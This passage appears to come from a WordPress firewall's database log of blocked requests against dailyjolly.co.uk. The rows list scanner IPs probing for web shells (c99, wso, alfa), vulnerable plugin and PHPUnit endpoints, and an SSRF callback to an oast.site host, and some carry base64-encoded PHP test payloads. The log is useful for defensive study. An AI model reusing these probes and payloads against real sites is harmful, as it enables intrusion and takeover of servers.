Safari\\/537.36\"}','InkQx0y4VAJoqaOMN5Yp8lHS',0,1674812772.0211,172,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://cf9pqni9k8ibnq800010dgkx716sutzch.oast.site','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','hudeBUaHrOKpRZ8fGQo9wAq7',0,1674812772.0214,193,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-json/visualizer/v1/upload-data','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.3319.102 Safari\\/537.36\"}','sB2VuQy30F47xGMroHdJbEqT',0,1674812772.0200,195,'','POST',403,0,700,0,1,'',0),('176.111.173.153',2960108953,'','https://dailyjolly.co.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','2Q9VzFyMWTGH1bZdNY6J5hno',0,1674819849.0114,199,'','POST',403,0,700,0,1,'',0),('176.111.173.153',2960108953,'','https://dailyjolly.co.uk/qcjcmwmo.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','6JvRUrQmh5GwZ0aLP1fBxkNl',0,1674819849.2527,190,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/assets/images/images.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','FH5nJ1RQpMKPvDO4yGCYjWcV',0,1674834671.9389,216,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/well-known/acme-challenge/a/a/a/a/a.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','CPOUnxZBckJdH4wD6iI51VTj',0,1674834673.4030,174,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/nc_assets/img/featured/600/600.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','tsvHq8eC65KT1rQc3kJOEXxp',0,1674834674.1142,176,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wp-admin/css/colors/colors.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','PzmncUahNtYAXMVrHILkove2',0,1674834674.8957,170,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wp-includes/wp-includes.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','AQWqDJkro5UFRe8CjtGhY6SH',0,1674834675.6809,159,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/cgi-bin/cgi-bin.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','n7URbfgxWSsMCFPuk9j8HiBw',0,1674834676.5153,184,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wp-content/wp-content.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','EvsUiNe34gyuRmSPVF6GLkKz',0,1674834677.2764,171,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wp-admin/wp-admin.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','jZB8gcGMCf1U6EKqdFbvOW23',0,1674834678.0783,170,'','GET',403,0,700,0,1,'',0),('104.243.43.39',1760766759,'','https://dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/dailyjolly.co.uk\\/\\/wp-content\\/themes\\/seotheme\\/db.php?u\"}','03klUNRHqxwaJ1mnpWOF9eBb',0,1674842693.3512,220,'','GET',403,0,700,0,1,'',0),('104.243.43.39',1760766759,'','https://dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/seoplugins\\/mar.php\"}','4et2sHunMS8UFpJcbG9vzlEX',0,1674842693.7300,189,'','GET',403,0,700,0,1,'',0),('104.243.43.39',1760766759,'','https://dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/dailyjolly.co.uk\\/\\/wp-content\\/themes\\/seotheme\\/mar.php\"}','thZjcalve61g2LfuCyGdBsQK',0,1674842694.0837,173,'','GET',403,0,700,0,1,'',0),('190.220.137.82',3202124114,'','https://www.dailyjolly.co.uk/wp-reset.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','bEtQDeMZWxvodJ628Gq1lRIf',0,1674873877.7807,416,'','GET',403,0,700,0,1,'',0),('190.220.137.82',3202124114,'','https://www.dailyjolly.co.uk/wp-setups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','LQNlskqeI19SD5bCpOuv7WtJ',0,1674873878.9922,216,'','GET',403,0,700,0,1,'',0),('190.220.137.82',3202124114,'','https://www.dailyjolly.co.uk/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','UgmEqMSQVXyh2dLaOI9tY8si',0,1674873880.0304,170,'','GET',403,0,700,0,1,'',0),('190.220.137.82',3202124114,'','https://www.dailyjolly.co.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','0xKfHS6dhkTjAbOieFswMzcl',0,1674873880.9713,238,'','POST',403,0,700,0,1,'',0),('190.220.137.82',3202124114,'','https://www.dailyjolly.co.uk/admin.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','x2mgHoQL1qsY8dSEnjWMDcCO',0,1674873882.0004,179,'','GET',403,0,700,0,1,'',0),('190.220.137.82',3202124114,'','https://www.dailyjolly.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','W4y9qGsmDaYdSf67oB350vRh',0,1674873883.0286,170,'','POST',403,0,700,0,1,'',0),('190.220.137.82',3202124114,'','https://www.dailyjolly.co.uk/wp-story.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','LIswjruh1Ba0tiTo3CUJd6NX',0,1674873883.9765,166,'','GET',403,0,700,0,1,'',0),('190.220.137.82',3202124114,'','https://www.dailyjolly.co.uk/wp-story.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','kpyfJmOE71h9QLdzlVaARI20',0,1674873884.9283,216,'','POST',403,0,700,0,1,'',0),('190.220.137.82',3202124114,'','https://www.dailyjolly.co.uk/123.php?1=dmFyX2R1bXAoIjg1NjQ1dzQiKTs=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','qBYVnyl4u1MW5fTvwCONc3Ia',0,1674873885.9194,185,'','GET',403,0,700,0,1,'',0),('190.220.137.82',3202124114,'','https://www.dailyjolly.co.uk/nf_tracking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','mIULC403QxbuzpYcSgaktAPd',0,1674873886.9075,189,'','GET',403,0,700,0,1,'',0),('207.204.249.63',3486316863,'','https://dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.28.2\"}','R6eqhW7CXBEOVUfg9ZdFc2MD',0,1674875825.4179,250,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','Oj9Fvx5LYkUlICQJhtsMdGHy',0,1674879543.5120,247,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.dailyjolly.co.uk/3index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','BmkLQJr6N2bvUGIlM0YnKxyH',0,1674879544.2543,172,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.dailyjolly.co.uk/wikindex.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','AdH0syXwLVlaoSPYug8WcIG5',0,1674879545.5915,161,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.dailyjolly.co.uk/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','2SU1xFAgJYObDXeRjKu48a9P',0,1674879546.2431,169,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','qCJSgsPFZKmvN7r4Qk6plEhM',0,1674879553.3900,181,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.dailyjolly.co.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','AB6hVHvj8UuidzJCpMfkKYWm',0,1674879554.1098,173,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.dailyjolly.co.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','C1GrD5JaHZV0FBEkqxUut6Kf',0,1674879559.6063,230,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.dailyjolly.co.uk/wp-content/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','Z2VGh0y7uFNCM1kdSmDwAOqs',0,1674879560.0754,228,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.dailyjolly.co.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','uQ8Pa6zcwMdyTF4JRvjqWxNU',0,1674879561.6984,189,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.dailyjolly.co.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','FC4EnNS0i3bY8spVgwAOLzcq',0,1674879562.4794,169,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','joX5rFYb4tRN31qpDSUynmHl',0,1674879562.8678,175,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','01WBlPSHsFX8ZJzvyURAYpba',0,1674879563.5550,164,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.dailyjolly.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','kS43Uh05KvBtLpIabHsofCZz',0,1674879565.1659,168,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','2K6xzXQ8tJG15Ycw0qiWpBUL',0,1674879570.4591,240,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.dailyjolly.co.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','7LMHN95i0SIJOCZtkVRQoes4',0,1674879573.3857,173,'','GET',403,0,700,0,1,'',0),('20.231.18.49',350687793,'','https://www.dailyjolly.co.uk/defau11.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','EMBh48S5znY2yklervOCUg6m',0,1674879574.7843,197,'','GET',403,0,700,0,1,'',0),('185.225.74.248',3118549752,'','https://dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','PZ1eOyHnECudv3gf0kbM4JLt',0,1674888662.0177,246,'','GET',403,0,700,0,1,'',0),('185.225.74.248',3118549752,'','https://dailyjolly.co.uk/modules/mod_ariimageslidersa/mod_ariimageslidersa.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','V84YxESzrJGtqhyaXkBCnv1P',0,1674888662.4195,167,'','GET',403,0,700,0,1,'',0),('185.225.74.248',3118549752,'','https://dailyjolly.co.uk/modules/mod_araticlws/mod_araticlws.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','ga8SxhGKCcweP9kzM2qIJnb6',0,1674888662.7558,169,'','GET',403,0,700,0,1,'',0),('13.90.41.180',224012724,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','bYTkou1JnD8Sg3CPNLMaAljB',0,1674890042.5956,288,'','GET',403,0,700,0,1,'',0),('13.90.41.180',224012724,'','https://www.dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','QakEnv6AcSmbChMYKZW40JwF',0,1674890089.9458,190,'','GET',403,0,700,0,1,'',0),('13.90.41.180',224012724,'','https://www.dailyjolly.co.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','H3g1yB76hQtaEYNFXb2jDCVu',0,1674890113.9485,202,'','GET',403,0,700,0,1,'',0),('13.90.41.180',224012724,'','https://www.dailyjolly.co.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','FBc5AXuV1edLozq2b9ywPkHp',0,1674890296.8021,189,'','GET',403,0,700,0,1,'',0),('13.90.41.180',224012724,'','https://www.dailyjolly.co.uk/wp-content/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','6RX3KN4fsZxpheQrWyPVA5gY',0,1674890297.1680,167,'','GET',403,0,700,0,1,'',0),('13.90.41.180',224012724,'','https://www.dailyjolly.co.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','ErwyaDfWGZ7LK2gdq5VsptTY',0,1674890461.3039,209,'','GET',403,0,700,0,1,'',0),('13.90.41.180',224012724,'','https://www.dailyjolly.co.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','X0k9ya834ZIE7WwGYfJMjnuB',0,1674890474.9031,234,'','GET',403,0,700,0,1,'',0),('13.90.41.180',224012724,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','IbDosatXShvAr0JeQjlczMBT',0,1674890475.3104,208,'','GET',403,0,700,0,1,'',0),('13.90.41.180',224012724,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','tERmGgMATCJdFbscYZS2OLNU',0,1674890506.4373,225,'','GET',403,0,700,0,1,'',0),('13.90.41.180',224012724,'','https://www.dailyjolly.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','yDlWdJGaIfRiv1509LFSCgwt',0,1674890526.7747,194,'','GET',403,0,700,0,1,'',0),('13.90.41.180',224012724,'','https://www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','bnEhWMdiXQY3UaKIfvNoVmPr',0,1674890898.9541,228,'','GET',403,0,700,0,1,'',0),('13.90.41.180',224012724,'','https://www.dailyjolly.co.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','V6LJZbHcuXMkfEsawvGjn2qF',0,1674891155.0831,200,'','GET',403,0,700,0,1,'',0),('13.90.41.180',224012724,'','https://www.dailyjolly.co.uk/defau11.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','WUB4FHxSZAmEikae7XgnzThu',0,1674891162.4789,199,'','GET',403,0,700,0,1,'',0),('147.78.47.249',2471374841,'','https://dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/105.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/dailyjolly.co.uk\\/wp-content\\/plugins\\/wp-file-manager\\/lib\\/php\\/connector.minimal.php\"}','T21QDHOANcf4KVWvbqEotXji',0,1674908167.4213,534,'','GET',403,0,700,0,1,'',0),('154.246.120.10',2599843850,'','https://www.dailyjolly.co.uk/filemanager/dialog.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; Redmi Note 9 Pro Build\\/QKQ1.191215.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/83.0.4103.101 Mobile Safari\\/537.36\"}','YETivbLXtaj9Z6s4HRfG8h7A',0,1674918893.8613,229,'','GET',403,0,700,0,1,'',0),('154.246.120.10',2599843850,'','https://www.dailyjolly.co.uk/assets/administrator/filemanager/dialog.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; Redmi Note 9 Pro Build\\/QKQ1.191215.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/83.0.4103.101 Mobile Safari\\/537.36\"}','sydcHxtobj8hMZCm74QaAPLU',0,1674918894.9528,192,'','GET',403,0,700,0,1,'',0),('154.246.120.10',2599843850,'','https://www.dailyjolly.co.uk/assets/admin/js/filemanager/dialog.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; Redmi Note 9 Pro Build\\/QKQ1.191215.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/83.0.4103.101 Mobile Safari\\/537.36\"}','pqcbniKF7Ijoywg4UBlufkWe',0,1674918895.8454,208,'','GET',403,0,700,0,1,'',0),('154.246.120.10',2599843850,'','https://www.dailyjolly.co.uk/assets/plugins/filemanager/dialog.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; Redmi Note 9 Pro Build\\/QKQ1.191215.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/83.0.4103.101 Mobile Safari\\/537.36\"}','9XKU0xVrSZtw3Cskm51Q6TMb',0,1674918896.8388,171,'','GET',403,0,700,0,1,'',0),('154.246.120.10',2599843850,'','https://www.dailyjolly.co.uk/assets/filemanager/dialog.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; Redmi Note 9 Pro Build\\/QKQ1.191215.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/83.0.4103.101 Mobile Safari\\/537.36\"}','ZBkYlSi185OK9bHQgAz3UmLq',0,1674918897.3638,197,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nNeCuxYOUDVG23qQ76AWItoz',0,1674925149.1504,244,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','cvWkraNHhz3tosdwJEP1C0qS',0,1674925149.8224,168,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','w2BzXYT8k375NAa9txOUDdgQ',0,1674925151.8743,210,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','EIqFKg7VLU3DnPoAxTGbSZhi',0,1674925152.5107,202,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1VQ7biyljuDY6BUAda5vezFK',0,1674925153.1325,175,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iZ8WYrFXxz3pTIuKaERHDqf2',0,1674925153.7373,207,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/home.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','XzvTEmRouKS4WcI6e8rVCZHj',0,1674925154.3639,168,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VQyhaq4fzXRdk23S75wKvtDU',0,1674925154.9552,206,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Oui9UjG8kVtyfnAhr4Jd25Ka',0,1674925155.5816,175,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ZHQ9EUgJ5IvadDlCMTR4tVOX',0,1674925156.1742,208,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 